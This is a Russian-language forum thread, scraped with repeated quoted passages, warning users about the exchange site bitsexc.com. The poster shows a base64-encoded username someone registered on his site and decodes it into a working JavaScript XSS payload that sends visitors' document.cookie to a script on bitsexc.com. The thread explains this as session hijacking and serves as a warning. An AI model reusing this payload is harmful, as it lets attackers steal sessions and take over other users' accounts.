Topic: Осторожно: хакерская биржа bitsexc.com (Read 201 times)
как распознать заранее что это хакерский сайт?
хорошо видимо быть хакером
Спасибо за информацию.Не когда бы не подумал.А откуда у вас именно таккая информация.Так для себя ,что бы знать или может узнавать еще !
Видимо вам надо очки по почте выслать... Если и сейчас не поймете откуда ТС такую информацию раздобыл то вам пожалуй даже подорожник не поможет.Обнаружил я это по тому, как на моем сайте зарегистрировался пользователь с интересным именем:
Code:
Спасибо за информацию.Не когда бы не подумал.А откуда у вас именно таккая информация.Так для себя ,что бы знать или может узнавать еще !
Строго говоря, так мог и не относящийся к бирже человек сделать. Чтобы подставить, например, добросовестных биржевиков 
Это классика: я не я, мне подкинули, нет у вас методов против Кости Сопрыкина )
Строго говоря, так мог и не относящийся к бирже человек сделать. Чтобы подставить, например, добросовестных биржевиков
Хочу предостеречь новичков и не только от того, чтобы вводить какие-либо данные на сайте https://bitsexc.com/
Этот сайт принадлежит хакерам или контролируется ими!
Обнаружил я это по тому, как на моем сайте зарегистрировался пользователь с интересным именем:
Странное имя для пользователя подумал я и попробовал расшифровать строчку "dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwczovL2JpdHNleGMuY29tL2luY2x 1ZGVzL3NlbmQucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaG lsZChpbWcpOw==". К счастью для расшифровки достаточно скопастить ее например на этом сайте https://www.base64decode.net/ (пункт Base64 decode)
Вот что там написано:
Если внезапно не все владеют яваскриптом, то перевожу на русский:
Хакер хотел чтобы все, кто заходит на страницу на которой показывается его имя пользователя, автоматически отправляли на сайт bitsexc.com данные о своей сессии-авторизаци. Дальще с этими данными хакер мог бы логиниться от имени других пользователей без пароля.
Этот сайт принадлежит хакерам или контролируется ими!
Обнаружил я это по тому, как на моем сайте зарегистрировался пользователь с интересным именем:
Code:
Странное имя для пользователя подумал я и попробовал расшифровать строчку "dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwczovL2JpdHNleGMuY29tL2luY2x 1ZGVzL3NlbmQucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaG lsZChpbWcpOw==". К счастью для расшифровки достаточно скопастить ее например на этом сайте https://www.base64decode.net/ (пункт Base64 decode)
Вот что там написано:
Code:
var img = new Image(0,0); img.src='https://bitsexc.com/includes/send.php?c=' + document.cookie; document.body.appendChild(img);
Если внезапно не все владеют яваскриптом, то перевожу на русский:
Хакер хотел чтобы все, кто заходит на страницу на которой показывается его имя пользователя, автоматически отправляли на сайт bitsexc.com данные о своей сессии-авторизаци. Дальще с этими данными хакер мог бы логиниться от имени других пользователей без пароля.
Jump to: